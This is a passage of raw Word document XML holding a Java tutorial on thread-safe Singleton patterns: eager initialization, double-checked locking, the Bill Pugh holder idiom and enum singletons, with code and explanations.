        <w:t>Singleton Design Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with thread-safety, you ensure that only one instance of the class is created and shared across all threads. In the example provided, both threads access the same instance and invoke the showMessage() method, demonstrating the proper functioning of the Singleton with multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3B885C" w14:textId="685C1126" w:rsidR="0029340F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0029340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136A4C6">
          <v:rect id="_x0000_i1168" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36536759" w14:textId="6BD04655" w:rsidR="004568BC" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc196307524"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to implement thread safety in java using singleton</w:t>
      </w:r>
      <w:r w:rsidR="004568BC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="42E10546" w14:textId="612EBC8F" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00DC1CE9">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lementing thread safety in Java using the Singleton design pattern ensures that only one instance of the class is created, even when multiple threads are accessing the Singleton instance concurrently. Here are the most common approaches to implementing thread safety for a Singleton class in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D941DDA" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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Eager Initialization (Thread-Safe by Default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A22B7" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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approach, the Singleton instance is created at the time of class loading, which ensures that the instance is always thread-safe because the class loader guarantees thread safety during initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3FFDD7"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4FA054A"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he instance is created eagerly when the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A995BD"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSTANC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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E253CB"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB56E4E"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ivate constructor prevents instantiation from other classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E55A530"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6AF1035"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650D9F23"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ublic method to provide access to the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569EF268"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getInstan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AC660D1"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INSTANCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177CEE05"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EC40338"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC472C"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showMess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20335EE"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ello from Singleton!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038C83A"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D660799"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3E7110"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C847603"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i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0B02D07"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1BC3A83"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> singleto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Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1D8CAD"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        singlet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howMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AAC7EE"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6EDCCB9" w14:textId="5DFCA53D"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725D3949" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6BA27F" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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INSTANCE is created when the class is loaded, ensuring thread-safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2545E171" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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synchronization is required because the instance is initialized when the class is loaded, and the class loader handles this in a thread-safe manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E676E8" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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Lazy Initialization with Double-Checked Locking (Thread-Safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C675E" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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you want to create the Singleton instance lazily (only when it's needed), you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>double-checked locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to make the getInstance() method thread-safe. This minimizes the overhead of synchronization once the instance is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B1970F"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5FCFB7A"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Volatile keyword ensures visibility of the instance across all threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05488025"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lati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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4968B2A1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5099A440"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ivate constructor prevents instantiation from other classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313F1C51"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D2E2CEF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7EC10A"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Double-Checked Locking to ensure thread safety during lazy initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC06BE8"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getInstan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CF883DE"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nstanc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4E7944C"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ynchronize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ingleton</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clas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330E760"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econd check to avoid creating more than one instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76291774"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nstanc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175A538"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xml:space="preserve">                    instanc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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3950145C"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029DE0B"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13836EB"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49FB6EE"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instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E398F1E"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13456C1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0F053"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showMess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9405B31"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ello from Singleton!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F76C19"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2FADA52"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C962A18"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D9BE4C"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i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76652CF"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B83A9F1"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> singleto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Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B34C1"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xml:space="preserve">        singlet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howMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC39E6A"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59E6E49" w14:textId="68334150"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2B6A8991" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312C5B50" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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olatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that the instance is visible across all threads, and the instance is not cached by any thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7EB86" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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first check (if (instance == null)) is outside the synchronized block to avoid unnecessary synchronization once the instance is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D336E3" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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econd check (if (instance == null)) inside the synchronized block ensures that only one instance is created, even if multiple threads reach this block simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EDA00C" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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Bill Pugh Singleton Design (Recommended Approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F21B053" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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Bill Pugh Singleton Design takes advantage of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java class loader mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure thread safety and lazy initialization. This is the most efficient and recommended way to implement a thread-safe Singleton.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19485A46"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7BBF81D"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nner static class responsible for creating Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512A2B5A"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Help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9CE0C16"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he Singleton instance is created when the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B29383"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSTANC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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD1FB87"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BAB5C4F"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68011CB0"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ivate constructor prevents instantiation from other classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB66B8D"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A48AB02"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D53AB4"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ublic method to provide access to the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F39D019"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getInstan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7F13E92"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Help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STANCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA7207"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EF574A6"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1988D2C2"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showMess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10A16C6"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ello from Singleton!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18698B"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295DB81"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A12ADD1"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A30F7A"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i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F95B262"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CE92522"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> singleto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Instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3742406D"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        singlet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howMessage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE5C7C"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B091579" w14:textId="19848439"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2FD62978" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4601AD52" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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inner static class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SingletonHelper contains the Singleton instance. The INSTANCE is created when the class is loaded, and the instance is thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4962FCA1" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ingleton instance is initialized lazily, and the class loader ensures that the INSTANCE is created in a thread-safe manner when the class is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75827E28" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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is approach takes advantage of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Initialization-on-demand holder idiom</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is efficient and guarantees thread safety without synchronization overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2EC449" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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Singleton with Enum (Thread-Safe by Default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2CF2D1" w14:textId="77777777" w:rsidR="00C15C61" w:rsidRPr="00CE4B95" w:rsidRDefault="00C15C61" w:rsidP="00C15C6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ing an enum to implement a Singleton is the most robust and thread-safe approach. Java's enum type inherently supports thread safety and guarantees that only one instance of the enum is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D9F30E"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>enum</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54E33A2"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    INSTANCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441F95A2"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABC4225"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ublic method to access the Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73423432"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showMess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DD94931"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ello from Singleton!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D9AD5A"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0DC1349"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DCBD32"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405313BC"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i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E28F4B4"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4407C54"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> singleto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STANCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
